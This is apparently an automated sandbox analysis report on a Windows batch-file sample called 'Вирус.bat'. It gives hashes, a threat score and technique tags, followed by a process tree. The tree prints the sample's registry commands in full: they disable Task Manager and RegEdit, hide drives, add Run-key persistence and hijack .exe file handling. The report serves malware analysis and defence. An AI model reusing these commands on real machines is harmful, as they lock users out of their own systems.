b901e9ee6264fda3dfbe5f3527c3a5bf51a3185c7034fdc9b85c5dd6136b93c1

Resubmissions

24/10/2023, 02:22

231024-ctyhbsbg99 1

24/10/2023, 02:21

231024-cs56saaa7z 8

24/10/2023, 02:20

231024-csghesaa7w 8

24/10/2023, 02:11

231024-cmscqsbg57 8

Analysis

max time kernel
36s
max time network
61s
platform
windows10-2004_x64
resource
win10v2004-20231023-en
resource tags

arch:x64arch:x86image:win10v2004-20231023-enlocale:en-usos:windows10-2004-x64system
submitted
24/10/2023, 02:21

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Вирус.bat
Size

8KB
MD5

418d1f775abafec5ecb582a39d6bda01
SHA1

d4cd5ee06f74752eb2955fa8d8ed1f1c58652654
SHA256

b901e9ee6264fda3dfbe5f3527c3a5bf51a3185c7034fdc9b85c5dd6136b93c1
SHA512

e3da1d99c2b8d94c569e478124f6b45c64173fa301dcccaa2528580f526667b0bdd3332a9bd8676f8b64a8c373d77475d73da69c4d350e4e0c6bc427f92f05e1
SSDEEP

96:SVrwV2EAV2EK0wQ+cdv7lvQcy2oFQ0ELzNMHNMnX839bLJSqPD06RbhoYEt8H2Zo:z2B2dcdF9PSmylelsccLIbhbK

Score

8^/10

evasion persistence

Malware Config

Signatures

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\disableregistrytools = "1"	reg.exe

Disables Task Manager via registry modification
evasion

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000\Control Panel\International\Geo\Nation	cmd.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RunExplorer32 = "C:\\Windows\\user32dll.bat"	reg.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Modifies Internet Explorer settings 1 TTPs 2 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_LOCALMACHINE_LOCKDOWN\IExplorer = "0"	reg.exe

Modifies registry class 3 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID	WScript.exe
Key created	\REGISTRY\USER\S-1-5-21-984744499-3605095035-265325720-1000_Classes\Local Settings	cmd.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
4104	WScript.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: 33	2016	AUDIODG.EXE
Token: SeIncBasePriorityPrivilege	2016	AUDIODG.EXE

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
3480	WScript.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 840 wrote to memory of 4112	840	cmd.exe	85
PID 840 wrote to memory of 4112	840	cmd.exe	85
PID 840 wrote to memory of 4940	840	cmd.exe	86
PID 840 wrote to memory of 4940	840	cmd.exe	86
PID 840 wrote to memory of 4724	840	cmd.exe	87
PID 840 wrote to memory of 4724	840	cmd.exe	87
PID 840 wrote to memory of 1212	840	cmd.exe	88
PID 840 wrote to memory of 1212	840	cmd.exe	88
PID 840 wrote to memory of 2028	840	cmd.exe	89
PID 840 wrote to memory of 2028	840	cmd.exe	89
PID 840 wrote to memory of 4840	840	cmd.exe	90
PID 840 wrote to memory of 4840	840	cmd.exe	90
PID 840 wrote to memory of 4212	840	cmd.exe	91
PID 840 wrote to memory of 4212	840	cmd.exe	91
PID 840 wrote to memory of 3992	840	cmd.exe	92
PID 840 wrote to memory of 3992	840	cmd.exe	92
PID 840 wrote to memory of 348	840	cmd.exe	93
PID 840 wrote to memory of 348	840	cmd.exe	93
PID 840 wrote to memory of 3572	840	cmd.exe	94
PID 840 wrote to memory of 3572	840	cmd.exe	94
PID 840 wrote to memory of 2820	840	cmd.exe	95
PID 840 wrote to memory of 2820	840	cmd.exe	95
PID 840 wrote to memory of 3048	840	cmd.exe	96
PID 840 wrote to memory of 3048	840	cmd.exe	96
PID 840 wrote to memory of 4404	840	cmd.exe	97
PID 840 wrote to memory of 4404	840	cmd.exe	97
PID 840 wrote to memory of 2456	840	cmd.exe	98
PID 840 wrote to memory of 2456	840	cmd.exe	98
PID 840 wrote to memory of 4040	840	cmd.exe	99
PID 840 wrote to memory of 4040	840	cmd.exe	99
PID 840 wrote to memory of 4064	840	cmd.exe	100
PID 840 wrote to memory of 4064	840	cmd.exe	100
PID 840 wrote to memory of 4736	840	cmd.exe	101
PID 840 wrote to memory of 4736	840	cmd.exe	101
PID 840 wrote to memory of 452	840	cmd.exe	102
PID 840 wrote to memory of 452	840	cmd.exe	102
PID 840 wrote to memory of 2044	840	cmd.exe	103
PID 840 wrote to memory of 2044	840	cmd.exe	103
PID 840 wrote to memory of 3984	840	cmd.exe	104
PID 840 wrote to memory of 3984	840	cmd.exe	104
PID 840 wrote to memory of 4584	840	cmd.exe	105
PID 840 wrote to memory of 4584	840	cmd.exe	105
PID 840 wrote to memory of 368	840	cmd.exe	106
PID 840 wrote to memory of 368	840	cmd.exe	106
PID 840 wrote to memory of 688	840	cmd.exe	108
PID 840 wrote to memory of 688	840	cmd.exe	108
PID 840 wrote to memory of 1676	840	cmd.exe	109
PID 840 wrote to memory of 1676	840	cmd.exe	109
PID 840 wrote to memory of 1364	840	cmd.exe	110
PID 840 wrote to memory of 1364	840	cmd.exe	110
PID 840 wrote to memory of 456	840	cmd.exe	111
PID 840 wrote to memory of 456	840	cmd.exe	111
PID 840 wrote to memory of 4456	840	cmd.exe	112
PID 840 wrote to memory of 4456	840	cmd.exe	112
PID 840 wrote to memory of 920	840	cmd.exe	113
PID 840 wrote to memory of 920	840	cmd.exe	113
PID 840 wrote to memory of 3972	840	cmd.exe	114
PID 840 wrote to memory of 3972	840	cmd.exe	114
PID 840 wrote to memory of 4872	840	cmd.exe	115
PID 840 wrote to memory of 4872	840	cmd.exe	115
PID 840 wrote to memory of 3864	840	cmd.exe	116
PID 840 wrote to memory of 3864	840	cmd.exe	116
PID 840 wrote to memory of 728	840	cmd.exe	117
PID 840 wrote to memory of 728	840	cmd.exe	117

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Вирус.bat"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:840
- C:\Windows\system32\reg.exe
  reg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v nodesktop /d 1 /freg add HKEY_USERS\S-1-5-21-343818398-1417001333-725345543-1003\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v ClassicShell /d 1 /fset ┬╢┬º=C:\Users\Admin\AppData\Local\Temp\Вирус.bat
  2⤵
  PID:4112
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v RunExplorer32 /d C:\Windows\user32dll.bat /f
  2⤵
  - Adds Run key to start application
  PID:4940
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoDrives /t REG_DWORD /d 67108863 /f
  2⤵
  PID:4724
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoViewOnDrive /t REG_DWORD /d 67108863 /f
  2⤵
  PID:1212
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoSelectDownloadDir" /d 1 /f
  2⤵
  PID:2028
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Microsoft\Internet Explorer\main\FeatureControl\Feature_LocalMachine_Lockdown" /v "IExplorer" /d 0 /f
  2⤵
  - Modifies Internet Explorer settings
  PID:4840
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoFindFiles" /d 1 /f
  2⤵
  PID:4212
- C:\Windows\system32\reg.exe
  reg add "HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions" /v "NoNavButtons" /d 1 /f
  2⤵
  PID:3992
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disabletaskmgr /t REG_DWORD /d 1 /f
  2⤵
  PID:348
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v disableregistrytools /t REG_DWORD /d 1 /f
  2⤵
  - Disables RegEdit via registry modification
  PID:3572
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:2820
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMFUprogramsList /t REG_DWORD /d 1 /f
  2⤵
  PID:3048
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:4404
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum" /v {20D04FE0-3AEA-1069-A2D8-08002B30309D} /t REG_DWORD /d 1 /f
  2⤵
  PID:2456
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:4040
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuNetworkPlaces /t REG_DWORD /d 1 /f
  2⤵
  PID:4064
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v StartmenuLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:4736
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuSubFolders /t REG_DWORD /d 1 /f
  2⤵
  PID:452
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoCommonGroups /t REG_DWORD /d 1 /f
  2⤵
  PID:2044
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFavoritesMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:3984
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRecentDocsMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:4584
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSetFolders /t REG_DWORD /d 1 /f
  2⤵
  PID:368
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoAddPrinter /t REG_DWORD /d 1 /f
  2⤵
  PID:688
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoFind /t REG_DWORD /d 1 /f
  2⤵
  PID:1676
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMHelp /t REG_DWORD /d 1 /f
  2⤵
  PID:1364
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:456
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:4456
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:920
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoChangeStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:3972
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyDocs /t REG_DWORD /d 1 /f
  2⤵
  PID:4872
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoSMMyPictures /t REG_DWORD /d 1 /f
  2⤵
  PID:3864
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoStartMenuMyMusic /t REG_DWORD /d 1 /f
  2⤵
  PID:728
- C:\Windows\system32\reg.exe
  reg add "hkcu\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  2⤵
  PID:3792
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\run" /v SwapNT /t REG_SZ /d rundll32 user32, SwapMouseButton /f
  2⤵
  PID:4244
- C:\Windows\system32\reg.exe
  reg add "HKCR\exefile\shell\open\command" /ve /t REG_SZ /d rundll32.exe /f
  2⤵
  PID:532
- C:\Windows\system32\rundll32.exe
  rundll32 user32, SwapMouseButton
  2⤵
  PID:1700
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\temp.vbs"
  2⤵
  - Modifies registry class
  - Suspicious use of FindShellTrayWindow
  PID:3480
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\temp1.vbs"
  2⤵
  PID:3512
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\temp2.vbs"
  2⤵
  - Checks computer location settings
  - Suspicious behavior: GetForegroundWindowSpam
  PID:4104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5024
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2832
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3008
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1248
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5104
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2520
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1908
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1124
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2856
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3372
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3792
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3076
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1444
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2668
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:556
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4824
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4868
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4424
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1064
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1952
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2468
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2836
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4440
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2268
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4388
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2936
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:688
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1124
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5052
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2284
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4068
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4888
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3148
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1620
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1604
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4156
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2168
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1212
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2380
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2088
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2036
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5064
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:2836
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:436
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4040
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3196
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3312
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3184
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3936
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1396
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4836
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1372
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4548
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3928
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4904
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:768
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1828
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4608
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2468
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2600
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5064
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4736
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4388
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2260
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:920
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3420
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2284
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3432
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4836
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:964
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:1372
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3056
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3940
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3016
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2780
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1852
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:220
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:980
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4148
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1176
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4444
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4404
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1940
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4988
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:452
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2116
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:688
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4848
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3960
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4292
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:404
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4836
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3336
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4700
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2588
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4824
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1316
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4348
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5116
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4724
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1288
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3572
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4444
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:5028
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:656
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:340
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3400
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4584
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2676
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:4848
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:2788
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:4144
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1516
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:3520
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:964
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:1504
- - C:\Windows\system32\cmd.exe
    "C:\Windows\system32\cmd.exe" /c echo
    3⤵
    PID:556
